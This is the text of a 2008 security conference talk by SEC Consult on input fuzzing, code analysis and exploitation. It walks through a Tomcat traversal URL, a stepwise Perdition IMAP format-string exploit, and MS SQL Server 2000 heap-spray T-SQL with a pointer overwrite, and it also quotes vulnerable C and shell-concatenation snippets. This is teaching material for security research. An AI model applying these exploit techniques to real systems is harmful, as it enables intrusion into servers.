Why software always breaks: From phone lines to CPU threads
2008
Version: 1.0
Author: Bernhard Müller
Responsible: Bernhard Müller
Date: 31.10.2008
Confidentiality: Public
About SEC Consult
• Leading information security advisor in Europe
• Sample customers (most customers are subject to NDA):
• Some vulnerabilities found by SEC Consult:
© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved
• MS05-037 (Internet Explorer JVIEW profiler vulnerability)
• CVE-2005-3591 (Macromedia Flash Player memory dereference)
• MS06-029 (MS Outlook Web Access script injection)
• CVE-2006-6690 (Typo3 shell command injection)
• CVE-2007-0450 (Apache Tomcat Directory Traversal)
• Regular talks at Blackhat and other security conferences
• More information at http://www.sec-consult.com/publikationen
Purpose of this talk
• Show you that most vulnerabilities in IT systems are essentially the same
• Fast-forward tour on vulnerability discovery and exploitation
• Give you some links and tools for your own research
Agenda
• „In band control“ vulnerabilities overview
• Input fuzzing
• Code- and binary analysis
• Exploitation and some examples
What do we mean by „in band control“
• Very broad definition: if user input is or can be mixed with control data (intentionally or unintentionally)
• When we can manipulate control data with our input, we can almost always hijack the control flow
[Diagram: internal logic and data processing; where attacker input overlaps with control data the outcome is attacker ownage, or return, exit, crash, or whatever]
Why is this possible
• Intentionally, often „security by obscurity“, or nobody thought about the security implications
• Examples:
• Phone phreaking
○ Phone line: Data channel = control channel
• ARP Spoofing
○ Ethernet: Data channel = control channel
• Arbitrary object instantiation
○ Also „obfuscated“ parameter passing in serialized Java objects,…
○ Nowadays, often seen in Enterprise web applications
Why is this possible
• Unintentionally (for numerous reasons)
• Programming errors
• Missing input validation
    char buf[256];
    strcpy(buf, userinput);

    exec("sendmail " + $recipient + " < email.txt")
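The sendmail line above is the talk's illustration of data and control sharing one channel. As an added example (not from the talk), the same construction is shown beside a hardened argument-vector form, with a check that tokenizes the concatenated command the way a POSIX shell would; the function names, the whitelist pattern and the sample recipients are constructed for this example.

```python
import re
import shlex

# Hypothetical whitelist: an address is data and may not carry shell syntax.
# A leading '-' is refused too, since sendmail would read it as an option.
RECIPIENT_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def build_command_unsafe(recipient: str) -> str:
    """The slide's construction: data concatenated into a shell command string."""
    return "sendmail " + recipient + " < email.txt"

def shell_tokens(command: str) -> list:
    """Tokenize as a POSIX shell would, with ; | & < > ( ) as separate tokens,
    so we can see exactly which words the shell would treat as control."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)

def words_from_recipient(recipient: str) -> list:
    """Shell words that the recipient alone turns into. The program meant it
    to be exactly one word; more than one means data has crossed into the
    control channel (the slide's 'overlap')."""
    tokens = shell_tokens(build_command_unsafe(recipient))
    return tokens[1:-2]       # drop the fixed 'sendmail' ... '<' 'email.txt'

def is_valid_recipient(recipient: str) -> bool:
    return RECIPIENT_RE.fullmatch(recipient) is not None

def build_argv_safe(recipient: str) -> list:
    """Hardened form: an argument vector for subprocess.run(argv, stdin=...).
    No shell parses it, so the recipient stays one argument whatever it
    contains; the whitelist is kept as defence in depth (options, logging)."""
    if not is_valid_recipient(recipient):
        raise ValueError(f"rejected recipient: {recipient!r}")
    return ["sendmail", recipient]

if __name__ == "__main__":
    for r in ("bob@example.com", "bob@example.com;id", "-bv"):   # constructed samples
        print(f"{r!r}: shell words {words_from_recipient(r)}, valid: {is_valid_recipient(r)}")
```

Note that "-bv" stays a single shell word, so tokenizing alone would not flag it; the whitelist is what rejects it.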
• Incomplete input validation
• Client side input validation
http://tomcat:8080/context/\../manager/html
Testing for vulnerabilities: Input Fuzzing (1)
• Simple method
• Identify the interface and expected input
• Try lots of inputs (mutated, random)
• Automated tools are available
• Generic protocol fuzzers
• Web application scanners
• Etc.
• Custom tools
• Use perl, python, etc. (something efficient!)
• Can be based on existing fuzzing frameworks
○ Scapy (kind of), Peach, Sulley
• Manual testing
• Especially useful for web applications
• Pros: Simple, fast and efficient
• Cons: Limited coverage
Testing for vulnerabilities: Input Fuzzing (2)
• Examples:
• Very simple „fuzzing“ on the command line
• More complex example: Fuzzing MS SQL extended server stored procedures
DEMO
Testing for vulnerabilities: Input Fuzzing (3)
• More complex example: Fuzzing MS SQL extended server stored procedures
1. Look up all existing stored procedures (don't rely on documentation alone)
2. Find out which parameters are processed
3. Write everything down in a format that your fuzzing script will be able to read
4. Create fuzzing script (e.g. based on Sulley)
5. Run script (use some existing framework to monitor results)
6. Check and verify results
• Rule of thumb: Create any (im)possible input
• This is what we want to see:
• … or any other deviation from normal behaviour…
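As an added example (not from the talk), the six steps above as a minimal mutation fuzzer in Python: parse_record is a constructed stand-in for a stored procedure with one deliberate bug, and the harness treats an expected ValueError as normal behaviour while recording any other exception, keeping the shortest reproducer for verification. All names and the seed record are hypothetical.

```python
import random

def parse_record(data: bytes) -> bytes:
    """Constructed target, standing in for a stored procedure: one length byte
    followed by the payload. Bad input is *meant* to raise ValueError; any
    other exception is a deviation from normal behaviour (the bug: a zero
    length is accepted and payload[0] is then read from an empty payload)."""
    if not data:
        raise ValueError("empty record")
    n = data[0]
    payload = data[1:1 + n]
    if len(payload) != n:
        raise ValueError("truncated record")
    return bytes([payload[0]]) + payload[1:].upper()

BOUNDARY = (0x00, 0x01, 0x7F, 0x80, 0xFF)   # "any (im)possible input"

def mutate(seed: bytes, rng: random.Random) -> bytes:
    """Steps 3-4: derive one mutated case from a known-good record."""
    buf = bytearray(seed)
    choice = rng.randrange(4)
    if choice == 0 and buf:                    # overwrite a byte with a boundary value
        buf[rng.randrange(len(buf))] = rng.choice(BOUNDARY)
    elif choice == 1 and buf:                  # flip a single bit
        i = rng.randrange(len(buf))
        buf[i] ^= 1 << rng.randrange(8)
    elif choice == 2:                          # grow with a long run of one byte
        buf += bytes([rng.choice(BOUNDARY)]) * rng.randrange(1, 300)
    else:                                      # truncate at a random point
        del buf[rng.randrange(len(buf) + 1):]
    return bytes(buf)

def fuzz(target, seed: bytes, iterations: int, rng_seed: int = 0,
         expected=(ValueError,)) -> dict:
    """Steps 5-6: run the cases, filter out handled errors, and keep the
    shortest reproducer per unexpected exception type for verification."""
    rng = random.Random(rng_seed)
    findings = {}
    for _ in range(iterations):
        case = mutate(seed, rng)
        try:
            target(case)
        except expected:                       # handled error: normal behaviour
            continue
        except Exception as exc:               # anything else is what we want to see
            key = type(exc).__name__
            if key not in findings or len(case) < len(findings[key]):
                findings[key] = case
    return findings

if __name__ == "__main__":
    for name, case in fuzz(parse_record, b"\x05hello", 2000, rng_seed=1).items():
        print(f"{name}: shortest reproducer {case!r}")
```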
Testing for vulnerabilities: Input Fuzzing (4)
• Monitoring results: Sulley web interface
Testing: In-depth application-/protocol analysis (1)
• Automatic code analysis:
• Code Scanning
○ Free tools: rats,…
○ Custom tools: Perl, Python, grep,…
○ Commercial Tools: Fortify SCA, Ounce,…
• Manual code analysis or binary analysis:
• Text editor (read the source), Eclipse
• Disassembler (binary analysis)
○ IDA Pro
○ OllyDBG
• Reverse Engineering
• e.g. network protocol: proxy, network sniffer,…
Testing: In-depth application-/protocol analysis (2)
• Our former example (someformparser.cgi):
• Normally, it's not that easy ☺
• Multiple ways of vulnerability analysis:
• Search for vulnerable functions and see if they are reached by user input
• Trace all user input and look if it reaches vulnerable code
• Do a complete, line by line audit, and cover the whole application
• A very complex topic obviously, we will cover that another time…
Exploitation (1)
• Problem: How do we decide if the condition is exploitable?
• Best way is a quick manual analysis (often based on experience)
• If the application / protocol is fundamentally flawed, no amount of external validation and protection can help it
• (Web-)application firewalls can be bypassed
• Runtime validation can be bypassed (PHP MAGIC_QUOTES etc.)
• Compiler measures can be bypassed (ASLR, Stack canaries,…)
• Intrusion prevention systems can be bypassed
• Most other things that someone invented can be bypassed (some are even ridiculous)
• Often, a very limited injection can be exploited
• One byte memory write
• PHP file inclusion on a packet filtered and web firewalled system with most or all PHP safeguards activated
• See examples on the next pages
• These are for binary applications, but the same principles apply to everything
Exploitation (2)
• Perdition IMAP Server: Limited format string vulnerability (2007)
• One format identifier can be injected
• Can't do things like „%.16705u%hn“
• Random stack etc. doesn't make it any easier

    static const char *__str_vwrite(io_t * io, const flag_t flag,
                                    const size_t nargs, const char *fmt, va_list ap,
                                    int *bytes)
    {
    (...)
        fmt_args = 0;
        for (place = 0; fmt[place] != '\0'; place++) {
            if (fmt[place] == '%')
                fmt[place + 1] == '%' ? place++ : fmt_args++;
        }
        if (fmt_args != nargs) {
    (...)
            VANESSA_LOGGER_DEBUG_UNSAFE("nargs and fmt mismatch: "
                                        "%d args requested, %d args in format",
                                        nargs, fmt_args);
            return (NULL);
        }

        *bytes = vsnprintf(__str_write_buf, STR_WRITE_BUF_LEN - 2, fmt, ap);
Exploitation (3)
• Perdition IMAP Server: Limited format string vulnerability (2007)
• Can be exploited by controlling program flow
1. read stack layout (to bypass ASLR)
2. put shellcode and .got address on the stack
3. overwrite .got entry for strncasecmp byte-by-byte (value is controlled by string length)
4. trigger call to strncasecmp
1. %13$08x -> Get shellcode address
2. LOL LOGIN \x70\x53\x06\x08 (+Shellcode) -> Setup stack
3. LOL LOGIN AAA..AAA%.hn -> Write b1
4. LOL LOGIN AAA..AAA%.hn -> Write b2
5. LOL LOGIN AAA..AAA%.hn -> Write b3
6. LOL LOGIN AAA..AAA%.hn -> Write b4
7. LOL AUTHENTICATE X X -> Trigger call to strncasecmp()
[Diagram: Login() writes the .got entry of strncasecmp at 0x08065370, which Authenticate() then reads: OWNED!]
Exploitation (4)
• MS SQL Server 2000: Limited memory overwrite (0day)
• SQL server crashes due to input validation error
○ Details will be published when a patch is out
• A single address can be overwritten with limited values
• Practically, we can only overwrite one DWORD with values between 0x0 and 0x1B58
• But that's enough, at least in Windows 2000
Exploitation (5)
• MS SQL Server 2000: Limited memory overwrite (0day)
1. Spray the heap with NOPs & shellcode
    SET @shell = @resPEB + (...)
    SET @counter = 0
    WHILE @counter < 7000
    BEGIN
        SET @counter = @counter + 1
        SET @sh000 = @sh000 + CHAR(144)
        SET @sh001 = @sh001 + CHAR(144)
        (...)
    END
    SET @sh000 = @sh000 + @shell
    SET @sh001 = @sh001 + @shell
    (...)
Exploitation (6)
• MS SQL Server 2000: Limited memory overwrite (0day)
2. Overwrite MSW of FastPEBLockRoutine pointer (has to be restored by the shellcode!)
1. 0x7ffdf020: 3c 31 88 77 6d 31 88 77
2. 0x7ffdf020: 3c 31 97 19 00 00 88 77
[Diagram: heap filled with NOPs & shellcode; the FastPEBLockRoutine pointer, originally 0x7788313c, becomes 0x1997313c]
The End
• References
• “Internet Exploiter” by Skylined (first use of heap spraying): http://www.edup.tudelft.nl/~bjwever/
• Perdition IMAP Proxy Format String Vulnerability (full advisory): http://www.sec-consult.com/files/20071031_perdition-imapd-fmtstr.txt
• Further reading
• M. Sutton, A. Greene, and P. Amini, “Fuzzing: Brute Force Vulnerability Discovery”, Addison-Wesley, 2007
• Greg Hoglund and Gary McGraw, “Exploiting Software: How to Break Code”, Addison-Wesley, 2004
• Security Mailing lists
○ http://seclists.org/bugtraq/
○ http://seclists.org/fulldisclosure/
The End
• Recommended toolbox:
• BURP Proxy (for testing web applications): http://portswigger.net/proxy/
• Scapy (for fuzzing network protocols): http://www.secdev.org/projects/scapy/
• Sulley fuzzing framework: http://www.fuzzing.org/fuzzing-software
• IDA Pro (good disassembler): http://www.datarescue.com/
• OllyDBG (good debugger): http://www.ollydbg.de/
• Metasploit (awesome shellcode generator): http://www.metasploit.com/
• Eclipse (for reading sourcecode): http://www.eclipse.org/
• Perl (for quick tools): http://www.perl.org/
• Python (for more complex tasks): http://www.python.org/
• MS Visual Studio: http://msdn.microsoft.com/en-us/vstudio/default.aspx
About SEC Consult
SEC Consult Unternehmensberatung GmbH
Mooslackengasse 17,
A-1190 Wien
Tel: +43 / 1 8903043 0
Fax: +43 / 1 8903043 15
Email: [email protected]
http://www.sec-consult.com